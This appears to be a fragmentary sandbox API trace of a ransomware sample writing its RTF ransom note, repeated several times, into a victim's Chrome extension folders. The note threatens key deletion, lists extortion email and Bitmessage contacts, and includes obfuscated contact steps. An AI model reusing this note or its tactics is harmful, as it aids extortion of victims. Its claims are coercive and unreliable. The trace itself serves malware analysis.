INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.514] WriteFile (in: hFile=0x228, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.515] CloseHandle (hObject=0x228) returned 1 [0284.515] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0284.515] GetLastError () returned 0x2 [0284.515] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.516] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic 